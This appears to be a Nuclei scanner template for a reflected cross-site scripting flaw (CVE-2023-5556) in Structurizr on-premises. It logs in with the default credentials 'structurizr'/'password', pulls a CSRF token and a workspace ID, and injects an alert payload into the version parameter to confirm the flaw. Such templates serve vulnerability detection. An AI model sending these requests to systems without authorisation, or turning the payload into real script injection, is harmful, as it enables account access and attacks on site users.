101 lines
2.7 KiB
YAML
101 lines
2.7 KiB
YAML
id: CVE-2023-5556
|
|
|
|
info:
|
|
name: Structurizr on-premises - Cross Site Scripting
|
|
author: shankaracharya
|
|
severity: medium
|
|
description: |
|
|
Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
|
|
reference:
|
|
- https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
|
|
- https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
|
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-5556
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00064
|
|
epss-percentile: 0.2616
|
|
cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 5
|
|
vendor: structurizr
|
|
product: on-premises_installation
|
|
shodan-query: http.favicon.hash:1199592666
|
|
tags: cve,cve2023,xss,structurizr,oos,authenticated
|
|
variables:
|
|
str: "{{randstr}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /signin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{username}}&password={{password}}&_csrf={{csrf}}&hash=
|
|
|
|
- |
|
|
GET /dashboard HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
- |
|
|
GET /workspace/create HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
username:
|
|
- "structurizr"
|
|
password:
|
|
- "password"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_3
|
|
words:
|
|
- '<a href="/dashboard">'
|
|
- 'Sign out'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: body_5
|
|
words:
|
|
- '");alert(document.domain);//'
|
|
- 'Structurizr'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
group: 1
|
|
regex:
|
|
- 'name="_csrf" value="([0-9a-z-]+)"'
|
|
internal: true
|
|
|
|
- type: regex
|
|
name: workspace
|
|
group: 1
|
|
part: header
|
|
regex:
|
|
- '\/workspace\/([0-9]+)\?scriptNonce='
|
|
internal: true
|
|
# digest: 4a0a00473045022016a3ee6251af449ae1b14713bb998bf8a1a1201b692604994b8cd372d97749ab022100f82dc06b090d493a3acbd963ee4c2af281045181ad00879d31f50806a5db4ed0:922c64590222798bb761d5b6d8e72950 |